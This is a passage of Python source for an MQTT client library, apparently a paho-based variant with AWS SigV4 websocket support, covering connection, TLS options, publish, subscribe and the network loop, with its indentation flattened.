sockpair_data = "0"
else:
sockpair_data = b"0"
def error_string(mqtt_errno):
"""Return the error string associated with an mqtt error number."""
if mqtt_errno == MQTT_ERR_SUCCESS:
return "No error."
elif mqtt_errno == MQTT_ERR_NOMEM:
return "Out of memory."
elif mqtt_errno == MQTT_ERR_PROTOCOL:
return "A network protocol error occurred when communicating with the broker."
elif mqtt_errno == MQTT_ERR_INVAL:
return "Invalid function arguments provided."
elif mqtt_errno == MQTT_ERR_NO_CONN:
return "The client is not currently connected."
elif mqtt_errno == MQTT_ERR_CONN_REFUSED:
return "The connection was refused."
elif mqtt_errno == MQTT_ERR_NOT_FOUND:
return "Message not found (internal error)."
elif mqtt_errno == MQTT_ERR_CONN_LOST:
return "The connection was lost."
elif mqtt_errno == MQTT_ERR_TLS:
return "A TLS error occurred."
elif mqtt_errno == MQTT_ERR_PAYLOAD_SIZE:
return "Payload too large."
elif mqtt_errno == MQTT_ERR_NOT_SUPPORTED:
return "This feature is not supported."
elif mqtt_errno == MQTT_ERR_AUTH:
return "Authorisation failed."
elif mqtt_errno == MQTT_ERR_ACL_DENIED:
return "Access denied by ACL."
elif mqtt_errno == MQTT_ERR_UNKNOWN:
return "Unknown error."
elif mqtt_errno == MQTT_ERR_ERRNO:
return "Error defined by errno."
else:
return "Unknown error."
def connack_string(connack_code):
"""Return the string associated with a CONNACK result."""
if connack_code == 0:
return "Connection Accepted."
elif connack_code == 1:
return "Connection Refused: unacceptable protocol version."
elif connack_code == 2:
return "Connection Refused: identifier rejected."
elif connack_code == 3:
return "Connection Refused: broker unavailable."
elif connack_code == 4:
return "Connection Refused: bad user name or password."
elif connack_code == 5:
return "Connection Refused: not authorised."
else:
return "Connection Refused: unknown reason."
def topic_matches_sub(sub, topic):
"""Check whether a topic matches a subscription.
For example:
foo/bar would match the subscription foo/# or +/bar
non/matching would not match the subscription non/+/+
"""
result = True
multilevel_wildcard = False
slen = len(sub)
tlen = len(topic)
if slen > 0 and tlen > 0:
if (sub[0] == '$' and topic[0] != '$') or (topic[0] == '$' and sub[0] != '$'):
return False
spos = 0
tpos = 0
while spos < slen and tpos < tlen:
if sub[spos] == topic[tpos]:
if tpos == tlen-1:
# Check for e.g. foo matching foo/#
if spos == slen-3 and sub[spos+1] == '/' and sub[spos+2] == '#':
result = True
multilevel_wildcard = True
break
spos += 1
tpos += 1
if tpos == tlen and spos == slen-1 and sub[spos] == '+':
spos += 1
result = True
break
else:
if sub[spos] == '+':
spos += 1
while tpos < tlen and topic[tpos] != '/':
tpos += 1
if tpos == tlen and spos == slen:
result = True
break
elif sub[spos] == '#':
multilevel_wildcard = True
if spos+1 != slen:
result = False
break
else:
result = True
break
else:
result = False
break
if not multilevel_wildcard and (tpos < tlen or spos < slen):
result = False
return result
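# Illustrative expectations for topic_matches_sub, restating the docstring
# examples above (added annotation, not upstream paho code):
#   topic_matches_sub('foo/#', 'foo/bar')          -> True
#   topic_matches_sub('+/bar', 'foo/bar')          -> True
#   topic_matches_sub('non/+/+', 'non/matching')   -> False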
def _socketpair_compat():
"""TCP/IP socketpair including Windows support"""
listensock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
listensock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listensock.bind(("127.0.0.1", 0))
listensock.listen(1)
iface, port = listensock.getsockname()
sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
sock1.setblocking(0)
try:
sock1.connect(("127.0.0.1", port))
except socket.error as err:
if err.errno != errno.EINPROGRESS and err.errno != errno.EWOULDBLOCK and err.errno != EAGAIN:
raise
sock2, address = listensock.accept()
sock2.setblocking(0)
listensock.close()
return (sock1, sock2)
class MQTTMessage:
""" This is a class that describes an incoming message. It is passed to the
on_message callback as the message parameter.
Members:
topic : String. topic that the message was published on.
    payload : String/bytes. The message payload.
qos : Integer. The message Quality of Service 0, 1 or 2.
retain : Boolean. If true, the message is a retained message and not fresh.
mid : Integer. The message id.
"""
def __init__(self):
self.timestamp = 0
self.state = mqtt_ms_invalid
self.dup = False
self.mid = 0
self.topic = ""
self.payload = None
self.qos = 0
self.retain = False
class Client(object):
"""MQTT version 3.1/3.1.1 client class.
This is the main class for use communicating with an MQTT broker.
General usage flow:
* Use connect()/connect_async() to connect to a broker
* Call loop() frequently to maintain network traffic flow with the broker
* Or use loop_start() to set a thread running to call loop() for you.
* Or use loop_forever() to handle calling loop() for you in a blocking
* function.
* Use subscribe() to subscribe to a topic and receive messages
* Use publish() to send messages
* Use disconnect() to disconnect from the broker
Data returned from the broker is made available with the use of callback
functions as described below.
Callbacks
=========
A number of callback functions are available to receive data back from the
broker. To use a callback, define a function and then assign it to the
client:
def on_connect(client, userdata, flags, rc):
print("Connection returned " + str(rc))
client.on_connect = on_connect
    All of the callbacks as described below have a "client" and a "userdata"
argument. "client" is the Client instance that is calling the callback.
"userdata" is user data of any type and can be set when creating a new client
instance or with user_data_set(userdata).
The callbacks:
on_connect(client, userdata, flags, rc): called when the broker responds to our connection
request.
flags is a dict that contains response flags from the broker:
flags['session present'] - this flag is useful for clients that are
using clean session set to 0 only. If a client with clean
session=0, that reconnects to a broker that it has previously
connected to, this flag indicates whether the broker still has the
session information for the client. If 1, the session still exists.
The value of rc determines success or not:
0: Connection successful
1: Connection refused - incorrect protocol version
2: Connection refused - invalid client identifier
3: Connection refused - server unavailable
4: Connection refused - bad username or password
5: Connection refused - not authorised
6-255: Currently unused.
on_disconnect(client, userdata, rc): called when the client disconnects from the broker.
The rc parameter indicates the disconnection state. If MQTT_ERR_SUCCESS
(0), the callback was called in response to a disconnect() call. If any
other value the disconnection was unexpected, such as might be caused by
a network error.
on_message(client, userdata, message): called when a message has been received on a
topic that the client subscribes to. The message variable is a
MQTTMessage that describes all of the message parameters.
on_publish(client, userdata, mid): called when a message that was to be sent using the
publish() call has completed transmission to the broker. For messages
with QoS levels 1 and 2, this means that the appropriate handshakes have
completed. For QoS 0, this simply means that the message has left the
client. The mid variable matches the mid variable returned from the
corresponding publish() call, to allow outgoing messages to be tracked.
This callback is important because even if the publish() call returns
success, it does not always mean that the message has been sent.
on_subscribe(client, userdata, mid, granted_qos): called when the broker responds to a
subscribe request. The mid variable matches the mid variable returned
from the corresponding subscribe() call. The granted_qos variable is a
list of integers that give the QoS level the broker has granted for each
of the different subscription requests.
on_unsubscribe(client, userdata, mid): called when the broker responds to an unsubscribe
request. The mid variable matches the mid variable returned from the
corresponding unsubscribe() call.
on_log(client, userdata, level, buf): called when the client has log information. Define
to allow debugging. The level variable gives the severity of the message
and will be one of MQTT_LOG_INFO, MQTT_LOG_NOTICE, MQTT_LOG_WARNING,
MQTT_LOG_ERR, and MQTT_LOG_DEBUG. The message itself is in buf.
"""
def __init__(self, client_id="", clean_session=True, userdata=None, protocol=MQTTv31, useSecuredWebsocket=False):
"""client_id is the unique client id string used when connecting to the
broker. If client_id is zero length or None, then one will be randomly
generated. In this case, clean_session must be True. If this is not the
case a ValueError will be raised.
clean_session is a boolean that determines the client type. If True,
the broker will remove all information about this client when it
disconnects. If False, the client is a persistent client and
subscription information and queued messages will be retained when the
client disconnects.
Note that a client will never discard its own outgoing messages on
disconnect. Calling connect() or reconnect() will cause the messages to
be resent. Use reinitialise() to reset a client to its original state.
userdata is user defined data of any type that is passed as the "userdata"
parameter to callbacks. It may be updated at a later point with the
user_data_set() function.
The protocol argument allows explicit setting of the MQTT version to
use for this client. Can be paho.mqtt.client.MQTTv311 (v3.1.1) or
paho.mqtt.client.MQTTv31 (v3.1), with the default being v3.1. If the
broker reports that the client connected with an invalid protocol
version, the client will automatically attempt to reconnect using v3.1
instead.
useSecuredWebsocket is a boolean that determines whether the client uses
MQTT over Websocket with sigV4 signing (True) or MQTT with plain TCP
socket. If True, the client will try to find AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY in the system environment variables and start the
sigV4 signing and Websocket handshake. Under this configuration, all
outbound MQTT packets will be wrapped around with Websocket framework. All
inbound MQTT packets will be automatically wss-decoded.
"""
if not clean_session and (client_id == "" or client_id is None):
raise ValueError('A client id must be provided if clean session is False.')
self._protocol = protocol
self._userdata = userdata
self._sock = None
self._sockpairR, self._sockpairW = _socketpair_compat()
self._keepalive = 60
self._message_retry = 20
self._last_retry_check = 0
self._clean_session = clean_session
if client_id == "" or client_id is None:
self._client_id = "paho/" + "".join(random.choice("0123456789ADCDEF") for x in range(23-5))
else:
self._client_id = client_id
self._username = ""
self._password = ""
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
self._out_packet = []
self._current_out_packet = None
self._last_msg_in = time.time()
self._last_msg_out = time.time()
self._ping_t = 0
self._last_mid = 0
self._state = mqtt_cs_new
self._max_inflight_messages = 20
self._out_messages = []
self._in_messages = []
self._inflight_messages = 0
self._will = False
self._will_topic = ""
self._will_payload = None
self._will_qos = 0
self._will_retain = False
self.on_disconnect = None
self.on_connect = None
self.on_publish = None
self.on_message = None
self.on_message_filtered = []
self.on_subscribe = None
self.on_unsubscribe = None
self.on_log = None
self._host = ""
self._port = 1883
self._bind_address = ""
self._in_callback = False
self._strict_protocol = False
self._callback_mutex = threading.Lock()
self._state_mutex = threading.Lock()
self._out_packet_mutex = threading.Lock()
self._current_out_packet_mutex = threading.Lock()
self._msgtime_mutex = threading.Lock()
self._out_message_mutex = threading.Lock()
self._in_message_mutex = threading.Lock()
self._thread = None
self._thread_terminate = False
self._ssl = None
self._tls_certfile = None
self._tls_keyfile = None
self._tls_ca_certs = None
self._tls_cert_reqs = None
self._tls_ciphers = None
self._tls_version = tls_version
self._tls_insecure = False
self._useSecuredWebsocket = useSecuredWebsocket # Do we enable secured websocket
self._backoffCore = backoffCore.progressiveBackoffCore() # Init the backoffCore using default configuration
self._AWSAccessKeyIDCustomConfig = ""
self._AWSSecretAccessKeyCustomConfig = ""
self._AWSSessionTokenCustomConfig = ""
def __del__(self):
pass
def setBackoffTiming(self, srcBaseReconnectTimeSecond, srcMaximumReconnectTimeSecond, srcMinimumConnectTimeSecond):
"""
Make custom settings for backoff timing for reconnect logic
srcBaseReconnectTimeSecond - The base reconnection time in seconds
srcMaximumReconnectTimeSecond - The maximum reconnection time in seconds
srcMinimumConnectTimeSecond - The minimum time in milliseconds that a connection must be maintained in order to be considered stable
* Raise ValueError if input params are malformed
"""
self._backoffCore.configTime(srcBaseReconnectTimeSecond, srcMaximumReconnectTimeSecond, srcMinimumConnectTimeSecond)
def configIAMCredentials(self, srcAWSAccessKeyID, srcAWSSecretAccessKey, srcAWSSessionToken):
"""
Make custom settings for IAM credentials for websocket connection
srcAWSAccessKeyID - AWS IAM access key
srcAWSSecretAccessKey - AWS IAM secret key
srcAWSSessionToken - AWS Session Token
"""
self._AWSAccessKeyIDCustomConfig = srcAWSAccessKeyID
self._AWSSecretAccessKeyCustomConfig = srcAWSSecretAccessKey
self._AWSSessionTokenCustomConfig = srcAWSSessionToken
def reinitialise(self, client_id="", clean_session=True, userdata=None):
if self._ssl:
self._ssl.close()
self._ssl = None
self._sock = None
elif self._sock:
self._sock.close()
self._sock = None
if self._sockpairR:
self._sockpairR.close()
self._sockpairR = None
if self._sockpairW:
self._sockpairW.close()
self._sockpairW = None
self.__init__(client_id, clean_session, userdata)
def tls_set(self, ca_certs, certfile=None, keyfile=None, cert_reqs=cert_reqs, tls_version=tls_version, ciphers=None):
"""Configure network encryption and authentication options. Enables SSL/TLS support.
ca_certs : a string path to the Certificate Authority certificate files
that are to be treated as trusted by this client. If this is the only
option given then the client will operate in a similar manner to a web
browser. That is to say it will require the broker to have a
certificate signed by the Certificate Authorities in ca_certs and will
communicate using TLS v1, but will not attempt any form of
authentication. This provides basic network encryption but may not be
sufficient depending on how the broker is configured.
certfile and keyfile are strings pointing to the PEM encoded client
certificate and private keys respectively. If these arguments are not
None then they will be used as client information for TLS based
authentication. Support for this feature is broker dependent. Note
        that if either of these files is encrypted and needs a password to
decrypt it, Python will ask for the password at the command line. It is
not currently possible to define a callback to provide the password.
cert_reqs allows the certificate requirements that the client imposes
on the broker to be changed. By default this is ssl.CERT_REQUIRED,
which means that the broker must provide a certificate. See the ssl
pydoc for more information on this parameter.
tls_version allows the version of the SSL/TLS protocol used to be
specified. By default TLS v1 is used. Previous versions (all versions
beginning with SSL) are possible but not recommended due to possible
security problems.
ciphers is a string specifying which encryption ciphers are allowable
for this connection, or None to use the defaults. See the ssl pydoc for
more information.
Must be called before connect() or connect_async()."""
if HAVE_SSL is False:
raise ValueError('This platform has no SSL/TLS.')
        if sys.version_info < (2, 7):
raise ValueError('Python 2.7 is the minimum supported version for TLS.')
if ca_certs is None:
raise ValueError('ca_certs must not be None.')
try:
f = open(ca_certs, "r")
except IOError as err:
raise IOError(ca_certs+": "+err.strerror)
else:
f.close()
if certfile is not None:
try:
f = open(certfile, "r")
except IOError as err:
raise IOError(certfile+": "+err.strerror)
else:
f.close()
if keyfile is not None:
try:
f = open(keyfile, "r")
except IOError as err:
raise IOError(keyfile+": "+err.strerror)
else:
f.close()
self._tls_ca_certs = ca_certs
self._tls_certfile = certfile
self._tls_keyfile = keyfile
self._tls_cert_reqs = cert_reqs
self._tls_version = tls_version
self._tls_ciphers = ciphers
def tls_insecure_set(self, value):
"""Configure verification of the server hostname in the server certificate.
If value is set to true, it is impossible to guarantee that the host
you are connecting to is not impersonating your server. This can be
useful in initial server testing, but makes it possible for a malicious
third party to impersonate your server through DNS spoofing, for
example.
Do not use this function in a real system. Setting value to true means
there is no point using encryption.
Must be called before connect()."""
if HAVE_SSL is False:
raise ValueError('This platform has no SSL/TLS.')
self._tls_insecure = value
def connect(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker.
host is the hostname or IP address of the remote broker.
port is the network port of the server host to connect to. Defaults to
1883. Note that the default port for MQTT over SSL/TLS is 8883 so if you
are using tls_set() the port may need providing.
keepalive: Maximum period in seconds between communications with the
broker. If no other messages are being exchanged, this controls the
rate at which the client will send ping messages to the broker.
"""
self.connect_async(host, port, keepalive, bind_address)
return self.reconnect()
def connect_srv(self, domain=None, keepalive=60, bind_address=""):
"""Connect to a remote broker.
domain is the DNS domain to search for SRV records; if None,
try to determine local domain name.
keepalive and bind_address are as for connect()
"""
if HAVE_DNS is False:
raise ValueError('No DNS resolver library found.')
if domain is None:
domain = socket.getfqdn()
domain = domain[domain.find('.') + 1:]
try:
rr = '_mqtt._tcp.%s' % domain
if self._ssl is not None:
# IANA specifies secure-mqtt (not mqtts) for port 8883
rr = '_secure-mqtt._tcp.%s' % domain
answers = []
for answer in dns.resolver.query(rr, dns.rdatatype.SRV):
addr = answer.target.to_text()[:-1]
answers.append((addr, answer.port, answer.priority, answer.weight))
except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.NoNameservers):
raise ValueError("No answer/NXDOMAIN for SRV in %s" % (domain))
# FIXME: doesn't account for weight
for answer in answers:
host, port, prio, weight = answer
try:
return self.connect(host, port, keepalive, bind_address)
except:
pass
raise ValueError("No SRV hosts responded")
def connect_async(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker asynchronously. This is a non-blocking
connect call that can be used with loop_start() to provide very quick
start.
host is the hostname or IP address of the remote broker.
port is the network port of the server host to connect to. Defaults to
1883. Note that the default port for MQTT over SSL/TLS is 8883 so if you
are using tls_set() the port may need providing.
keepalive: Maximum period in seconds between communications with the
broker. If no other messages are being exchanged, this controls the
rate at which the client will send ping messages to the broker.
"""
if host is None or len(host) == 0:
raise ValueError('Invalid host.')
if port <= 0:
raise ValueError('Invalid port number.')
if keepalive < 0:
raise ValueError('Keepalive must be >=0.')
if bind_address != "" and bind_address is not None:
if (sys.version_info[0] == 2 and sys.version_info[1] < 7) or (sys.version_info[0] == 3 and sys.version_info[1] < 2):
raise ValueError('bind_address requires Python 2.7 or 3.2.')
self._host = host
self._port = port
self._keepalive = keepalive
self._bind_address = bind_address
self._state_mutex.acquire()
self._state = mqtt_cs_connect_async
self._state_mutex.release()
def reconnect(self):
"""Reconnect the client after a disconnect. Can only be called after
connect()/connect_async()."""
if len(self._host) == 0:
raise ValueError('Invalid host.')
if self._port <= 0:
raise ValueError('Invalid port number.')
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
self._out_packet_mutex.acquire()
self._out_packet = []
self._out_packet_mutex.release()
self._current_out_packet_mutex.acquire()
self._current_out_packet = None
self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_in = time.time()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
self._ping_t = 0
self._state_mutex.acquire()
self._state = mqtt_cs_new
self._state_mutex.release()
if self._ssl:
self._ssl.close()
self._ssl = None
self._sock = None
elif self._sock:
self._sock.close()
self._sock = None
# Put messages in progress in a valid state.
self._messages_reconnect_reset()
try:
if (sys.version_info[0] == 2 and sys.version_info[1] < 7) or (sys.version_info[0] == 3 and sys.version_info[1] < 2):
sock = socket.create_connection((self._host, self._port))
else:
sock = socket.create_connection((self._host, self._port), source_address=(self._bind_address, 0))
except socket.error as err:
if err.errno != errno.EINPROGRESS and err.errno != errno.EWOULDBLOCK and err.errno != EAGAIN:
raise
if self._tls_ca_certs is not None:
if self._useSecuredWebsocket:
# Never assign to ._ssl before wss handshake is finished
# Non-None value for ._ssl will allow ops before wss-MQTT connection is established
rawSSL = ssl.wrap_socket(sock, ca_certs=self._tls_ca_certs, cert_reqs=ssl.CERT_REQUIRED) # Add server certificate verification
rawSSL.setblocking(0) # Non-blocking socket
                self._ssl = wssCore.securedWebsocketCore(rawSSL, self._host, self._port, self._AWSAccessKeyIDCustomConfig, self._AWSSecretAccessKeyCustomConfig, self._AWSSessionTokenCustomConfig)  # Override the _ssl socket
# self._ssl.enableDebug()
else:
self._ssl = ssl.wrap_socket(
sock,
certfile=self._tls_certfile,
keyfile=self._tls_keyfile,
ca_certs=self._tls_ca_certs,
cert_reqs=self._tls_cert_reqs,
ssl_version=self._tls_version,
ciphers=self._tls_ciphers)
if self._tls_insecure is False:
if sys.version_info[0] < 3 or (sys.version_info[0] == 3 and sys.version_info[1] < 2):
self._tls_match_hostname()
else:
ssl.match_hostname(self._ssl.getpeercert(), self._host)
self._sock = sock
self._sock.setblocking(0)
return self._send_connect(self._keepalive, self._clean_session)
def loop(self, timeout=1.0, max_packets=1):
"""Process network events.
This function must be called regularly to ensure communication with the
broker is carried out. It calls select() on the network socket to wait
for network events. If incoming data is present it will then be
processed. Outgoing commands, from e.g. publish(), are normally sent
        immediately when their function is called, but this is not always
possible. loop() will also attempt to send any remaining outgoing
messages, which also includes commands that are part of the flow for
messages with QoS>0.
timeout: The time in seconds to wait for incoming/outgoing network
traffic before timing out and returning.
max_packets: Not currently used.
Returns MQTT_ERR_SUCCESS on success.
Returns >0 on error.
A ValueError will be raised if timeout < 0"""
if timeout < 0.0:
raise ValueError('Invalid timeout.')
self._current_out_packet_mutex.acquire()
self._out_packet_mutex.acquire()
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
if self._current_out_packet:
wlist = [self.socket()]
else:
wlist = []
self._out_packet_mutex.release()
self._current_out_packet_mutex.release()
# sockpairR is used to break out of select() before the timeout, on a
# call to publish() etc.
rlist = [self.socket(), self._sockpairR]
try:
socklist = select.select(rlist, wlist, [], timeout)
except TypeError as e:
            # Socket isn't of the correct type; in all likelihood the connection is lost
return MQTT_ERR_CONN_LOST
except ValueError:
# Can occur if we just reconnected but rlist/wlist contain a -1 for
# some reason.
return MQTT_ERR_CONN_LOST
except:
return MQTT_ERR_UNKNOWN
if self.socket() in socklist[0]:
rc = self.loop_read(max_packets)
if rc or (self._ssl is None and self._sock is None):
return rc
if self._sockpairR in socklist[0]:
# Stimulate output write even though we didn't ask for it, because
# at that point the publish or other command wasn't present.
socklist[1].insert(0, self.socket())
# Clear sockpairR - only ever a single byte written.
try:
self._sockpairR.recv(1)
except socket.error as err:
if err.errno != EAGAIN:
raise
if self.socket() in socklist[1]:
rc = self.loop_write(max_packets)
if rc or (self._ssl is None and self._sock is None):
return rc
return self.loop_misc()
def publish(self, topic, payload=None, qos=0, retain=False):
"""Publish a message on a topic.
This causes a message to be sent to the broker and subsequently from
the broker to any clients subscribing to matching topics.
topic: The topic that the message should be published on.
payload: The actual message to send. If not given, or set to None a
zero length message will be used. Passing an int or float will result
in the payload being converted to a string representing that number. If
you wish to send a true int/float, use struct.pack() to create the
payload you require.
qos: The quality of service level to use.
retain: If set to true, the message will be set as the "last known
good"/retained message for the topic.
Returns a tuple (result, mid), where result is MQTT_ERR_SUCCESS to
indicate success or MQTT_ERR_NO_CONN if the client is not currently
connected. mid is the message ID for the publish request. The mid
value can be used to track the publish request by checking against the
mid argument in the on_publish() callback if it is defined.
A ValueError will be raised if topic is None, has zero length or is
invalid (contains a wildcard), if qos is not one of 0, 1 or 2, or if
the length of the payload is greater than 268435455 bytes."""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, str) or isinstance(payload, bytearray):
local_payload = payload
elif sys.version_info[0] < 3 and isinstance(payload, unicode):
local_payload = payload
elif isinstance(payload, int) or isinstance(payload, float):
local_payload = str(payload)
elif payload is None:
local_payload = None
else:
raise TypeError('payload must be a string, bytearray, int, float or None.')
if local_payload is not None and len(local_payload) > 268435455:
raise ValueError('Payload too large.')
if self._topic_wildcard_len_check(topic) != MQTT_ERR_SUCCESS:
raise ValueError('Publish topic cannot contain wildcards.')
local_mid = self._mid_generate()
if qos == 0:
rc = self._send_publish(local_mid, topic, local_payload, qos, retain, False)
return (rc, local_mid)
else:
message = MQTTMessage()
message.timestamp = time.time()
message.mid = local_mid
message.topic = topic
if local_payload is None or len(local_payload) == 0:
message.payload = None
else:
message.payload = local_payload
message.qos = qos
message.retain = retain
message.dup = False
self._out_message_mutex.acquire()
self._out_messages.append(message)
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
self._inflight_messages = self._inflight_messages+1
if qos == 1:
message.state = mqtt_ms_wait_for_puback
elif qos == 2:
message.state = mqtt_ms_wait_for_pubrec
self._out_message_mutex.release()
rc = self._send_publish(message.mid, message.topic, message.payload, message.qos, message.retain, message.dup)
                # Remove from inflight messages so it will be sent once a connection is made
if rc is MQTT_ERR_NO_CONN:
with self._out_message_mutex:
self._inflight_messages -= 1
message.state = mqtt_ms_publish
return (rc, local_mid)
else:
                message.state = mqtt_ms_queued
self._out_message_mutex.release()
return (MQTT_ERR_SUCCESS, local_mid)
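    # Illustrative usage sketch (not part of the client implementation),
    # assuming `mqttc` is a connected instance of this class:
    #
    #   rc, mid = mqttc.publish("sensors/temperature", payload="21.5", qos=1)
    #   # `mid` can later be matched against the mid passed to on_publish()
    #   # to confirm that this particular message completed its flow.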
def username_pw_set(self, username, password=None):
"""Set a username and optionally a password for broker authentication.
Must be called before connect() to have any effect.
Requires a broker that supports MQTT v3.1.
username: The username to authenticate with. Need have no relationship to the client id.
password: The password to authenticate with. Optional, set to None if not required.
"""
self._username = username.encode('utf-8')
self._password = password
def disconnect(self):
"""Disconnect a connected client from the broker."""
self._state_mutex.acquire()
self._state = mqtt_cs_disconnecting
self._state_mutex.release()
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
return self._send_disconnect()
def subscribe(self, topic, qos=0):
"""Subscribe the client to one or more topics.
This function may be called in three different ways:
Simple string and integer
-------------------------
e.g. subscribe("my/topic", 2)
topic: A string specifying the subscription topic to subscribe to.
qos: The desired quality of service level for the subscription.
Defaults to 0.
String and integer tuple
------------------------
e.g. subscribe(("my/topic", 1))
topic: A tuple of (topic, qos). Both topic and qos must be present in
the tuple.
qos: Not used.
List of string and integer tuples
        ---------------------------------
e.g. subscribe([("my/topic", 0), ("another/topic", 2)])
        This allows multiple topic subscriptions in a single SUBSCRIBE
        command, which is more efficient than using multiple calls to
        subscribe().
topic: A list of tuple of format (topic, qos). Both topic and qos must
be present in all of the tuples.
qos: Not used.
The function returns a tuple (result, mid), where result is
MQTT_ERR_SUCCESS to indicate success or (MQTT_ERR_NO_CONN, None) if the
client is not currently connected. mid is the message ID for the
subscribe request. The mid value can be used to track the subscribe
request by checking against the mid argument in the on_subscribe()
callback if it is defined.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length, or if topic is not a string, tuple or list.
"""
topic_qos_list = None
        if isinstance(topic, str):
            if qos < 0 or qos > 2:
                raise ValueError('Invalid QoS level.')
            if len(topic) == 0:
                raise ValueError('Invalid topic.')
            topic_qos_list = [(topic.encode('utf-8'), qos)]
        elif isinstance(topic, tuple):
            if topic[1] < 0 or topic[1] > 2:
                raise ValueError('Invalid QoS level.')
            if topic[0] is None or len(topic[0]) == 0 or not isinstance(topic[0], str):
                raise ValueError('Invalid topic.')
            topic_qos_list = [(topic[0].encode('utf-8'), topic[1])]
        elif isinstance(topic, list):
            topic_qos_list = []
            for t in topic:
                if t[1] < 0 or t[1] > 2:
                    raise ValueError('Invalid QoS level.')
                if t[0] is None or len(t[0]) == 0 or not isinstance(t[0], str):
                    raise ValueError('Invalid topic.')
                topic_qos_list.append((t[0].encode('utf-8'), t[1]))
if topic_qos_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None and self._ssl is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_subscribe(False, topic_qos_list)
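    # Illustrative usage sketch of the three calling forms described above
    # (not part of the client implementation):
    #
    #   mqttc.subscribe("my/topic", 2)                      # string + qos
    #   mqttc.subscribe(("my/topic", 1))                    # (topic, qos) tuple
    #   mqttc.subscribe([("my/topic", 0), ("other/#", 2)])  # list of tuples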
def unsubscribe(self, topic):
"""Unsubscribe the client from one or more topics.
topic: A single string, or list of strings that are the subscription
topics to unsubscribe from.
Returns a tuple (result, mid), where result is MQTT_ERR_SUCCESS
to indicate success or (MQTT_ERR_NO_CONN, None) if the client is not
currently connected.
mid is the message ID for the unsubscribe request. The mid value can be
used to track the unsubscribe request by checking against the mid
argument in the on_unsubscribe() callback if it is defined.
Raises a ValueError if topic is None or has zero string length, or is
not a string or list.
"""
topic_list = None
if topic is None:
raise ValueError('Invalid topic.')
if isinstance(topic, str):
if len(topic) == 0:
raise ValueError('Invalid topic.')
topic_list = [topic.encode('utf-8')]
elif isinstance(topic, list):
topic_list = []
for t in topic:
if len(t) == 0 or not isinstance(t, str):
raise ValueError('Invalid topic.')
topic_list.append(t.encode('utf-8'))
if topic_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None and self._ssl is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_unsubscribe(False, topic_list)
def loop_read(self, max_packets=1):
"""Process read network events. Use in place of calling loop() if you
wish to handle your client reads as part of your own application.
Use socket() to obtain the client socket to call select() or equivalent
on.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_messages) + len(self._in_messages)
if max_packets < 1:
max_packets = 1
for i in range(0, max_packets):
rc = self._packet_read()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def loop_write(self, max_packets=1):
"""Process read network events. Use in place of calling loop() if you
wish to handle your client reads as part of your own application.
Use socket() to obtain the client socket to call select() or equivalent
on.
Use want_write() to determine if there is data waiting to be written.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_packet) + 1
if max_packets < 1:
max_packets = 1
for i in range(0, max_packets):
rc = self._packet_write()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def want_write(self):
"""Call to determine if there is network data waiting to be written.
Useful if you are calling select() yourself rather than using loop().
"""
if self._current_out_packet or len(self._out_packet) > 0:
return True
else:
return False
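    # Illustrative sketch of driving the client from your own select() loop,
    # as the docstrings above describe (not part of the client
    # implementation):
    #
    #   rlist = [mqttc.socket()]
    #   wlist = [mqttc.socket()] if mqttc.want_write() else []
    #   readable, writable, _ = select.select(rlist, wlist, [], 1.0)
    #   if readable:
    #       mqttc.loop_read()
    #   if writable:
    #       mqttc.loop_write()
    #   mqttc.loop_misc()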
def loop_misc(self):
"""Process miscellaneous network events. Use in place of calling loop() if you
wish to call select() or equivalent on.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
now = time.time()
self._check_keepalive()
if self._last_retry_check+1 < now:
# Only check once a second at most
self._message_retry_check()
self._last_retry_check = now
if self._ping_t > 0 and now - self._ping_t >= self._keepalive:
# client->ping_t != 0 means we are waiting for a pingresp.
# This hasn't happened in the keepalive time so we should disconnect.
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
self._callback_mutex.acquire()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
rc = 1
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_CONN_LOST
return MQTT_ERR_SUCCESS
def max_inflight_messages_set(self, inflight):
"""Set the maximum number of messages with QoS>0 that can be part way
through their network flow at once. Defaults to 20."""
if inflight < 0:
raise ValueError('Invalid inflight.')
self._max_inflight_messages = inflight
def message_retry_set(self, retry):
